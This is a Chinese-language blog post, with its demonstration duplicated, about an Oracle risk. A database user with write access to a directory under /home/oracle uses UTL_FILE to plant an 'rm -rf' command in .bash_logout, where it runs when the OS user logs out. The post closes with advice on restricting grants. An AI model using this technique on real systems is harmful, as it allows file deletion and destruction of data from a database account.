oracle中create directory建在/home/oracle下可能存在的風險
impdp/expdp等是需要建目錄進行匯入匯出的,如果oracle中建一個driectory在/home/oracle下,這樣只要有對這個directory進行write許可權的資料庫使用者,
再加上預設就有對utl_file包的execute許可權,就可以做很多事情.
以下演示:
##在/home/oracle下,建一個文字檔案
[oracle@ct6605 ~]$ touch /home/oracle/abc.txt
[oracle@ct6605 ~]$ ll /home/oracle/abc.txt
-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt
[oracle@ct6605 ~]$ sqlplus system/system
SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--在/home/oracle下建一個direcotry
SQL> create directory home_dump as '/home/oracle';
Directory created.
--啟用scott,用以測試
SQL> alter user scott account unlock;
User altered.
SQL> alter user scott identified by system;
User altered.
--授給scott對home_dump的寫許可權
SQL> grant write on directory home_dump to scott;
Grant succeeded.
SQL> conn scott/system
Connected.
--透過utl_file,修改/home/oracle/.bash_profile下的檔案,使當oracle使用者登入linux又登出時,自動執行此指令碼,此處可以操作所以oracle使用者有許可權的檔案,
這裡只是刪除一個abc.txt,如果改成刪除oracle的資料檔案加備份,後果就比較嚴重了.
SQL> DECLARE
t_fh utl_file.file_type;
begin
t_fh := utl_file.fopen('HOME_DUMP','.bash_logout','w');
utl_file.put_line(t_fh,'rm -rf /home/oracle/abc.txt');
utl_file.fclose(t_fh);
end; 2 3 4 5 6 7
8 /
PL/SQL procedure successfully completed.
SQL> exit
[oracle@ct6605 ~]$ cat .bash_logout
rm -rf /home/oracle/abc.txt
[oracle@ct6605 ~]$ exit
logout
--這裡可以看到/home/oracle/abc.txt已經被刪除了
[root@ct6605 ~]# ll /home/oracle/abc.txt
ls: cannot access /home/oracle/abc.txt: No such file or directory
可以看到,要防止此問題的發生,就要管控好directory的create,write許可權,儘量去掉public的utl_file包execute許可權.
另外順便提一下,mysql中,select ... into outfile同樣存在類似風險.
再加上預設就有對utl_file包的execute許可權,就可以做很多事情.
以下演示:
##在/home/oracle下,建一個文字檔案
[oracle@ct6605 ~]$ touch /home/oracle/abc.txt
[oracle@ct6605 ~]$ ll /home/oracle/abc.txt
-rw-r--r-- 1 oracle oinstall 0 Oct 19 11:09 /home/oracle/abc.txt
[oracle@ct6605 ~]$ sqlplus system/system
SQL*Plus: Release 11.2.0.4.0 Production on Mon Oct 19 11:04:31 2015
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--在/home/oracle下建一個direcotry
SQL> create directory home_dump as '/home/oracle';
Directory created.
--啟用scott,用以測試
SQL> alter user scott account unlock;
User altered.
SQL> alter user scott identified by system;
User altered.
--授給scott對home_dump的寫許可權
SQL> grant write on directory home_dump to scott;
Grant succeeded.
SQL> conn scott/system
Connected.
--透過utl_file,修改/home/oracle/.bash_profile下的檔案,使當oracle使用者登入linux又登出時,自動執行此指令碼,此處可以操作所以oracle使用者有許可權的檔案,
這裡只是刪除一個abc.txt,如果改成刪除oracle的資料檔案加備份,後果就比較嚴重了.
SQL> DECLARE
t_fh utl_file.file_type;
begin
t_fh := utl_file.fopen('HOME_DUMP','.bash_logout','w');
utl_file.put_line(t_fh,'rm -rf /home/oracle/abc.txt');
utl_file.fclose(t_fh);
end; 2 3 4 5 6 7
8 /
PL/SQL procedure successfully completed.
SQL> exit
[oracle@ct6605 ~]$ cat .bash_logout
rm -rf /home/oracle/abc.txt
[oracle@ct6605 ~]$ exit
logout
--這裡可以看到/home/oracle/abc.txt已經被刪除了
[root@ct6605 ~]# ll /home/oracle/abc.txt
ls: cannot access /home/oracle/abc.txt: No such file or directory
可以看到,要防止此問題的發生,就要管控好directory的create,write許可權,儘量去掉public的utl_file包execute許可權.
另外順便提一下,mysql中,select ... into outfile同樣存在類似風險.
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/28539951/viewspace-1814910/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- create directory in OracleOracle
- Using Create directory & UTL_FILE in OracleOracle
- oracle 11g expdb autoextend tablespace and create directory error;OracleError
- Oracle 中$ORACLE_HOME/bin/oracle檔案Oracle
- RedHat ES5 500 OOPS: cannot change directory:/home/oracleRedhatOOPOracle
- 使用ACTION_IMAGE_CAPTURE可能存在的風險APT
- 切換使用者時提示:cannot change directory to /home/oracle: Permission deniedOracle
- oracle中extents存在的理由Oracle
- $ORACLE_HOME/dbs下的lk檔案Oracle
- $ORACLE_HOME/bin 下的utilities 解釋Oracle
- Oracle ASM User Directory and Group DirectoryOracleASM
- Oracle中checkpoint存在的意義Oracle
- $ORACLE_HOME/bin 下的utilities 解釋windowsOracleWindows
- Oracle Forum HOMEOracle
- oracle clone oracle_home 方法Oracle
- sqlplus login -- SP2-0750: You may need to set ORACLE_HOME to your Oracle software directorySQLOracle
- Oracle ASM Disk DirectoryOracleASM
- Oracle ASM File DirectoryOracleASM
- Oracle ASM Alias DirectoryOracleASM
- Oracle ASM Template DirectoryOracleASM
- move oracle 10 directoryOracle
- ORACLE directory 目錄Oracle
- 克隆(clone) ORACLE HOMEOracle
- Clone (克隆) ORACLE HOMEOracle
- ORACLE_BASE 與 ORACLE_HOMEOracle
- ORACLE_BASE和ORACLE_HOME的區別Oracle
- Oracle ASM Attributes DirectoryOracleASM
- Oracle ASM Volume DirectoryOracleASM
- Oracle ASM Active Change DirectoryOracleASM
- oracle 之recovery directory databaseOracleDatabase
- oracle中 Wait Events 和可能原因(oracle doc)OracleAI
- Oracle Directory目錄的知識Oracle
- 500 OOPS: cannot change directory:/home/OOP
- linux下設定ORACLE_SID和ORACLE_HOME變數LinuxOracle變數
- 【轉】oracle_base 和 oracle_home 的區別Oracle
- Oracle資料庫中Create user的注意事項Oracle資料庫
- 詳解oracle使用者建立(create user)(下)Oracle
- Oracle ASM Disk Used Space DirectoryOracleASM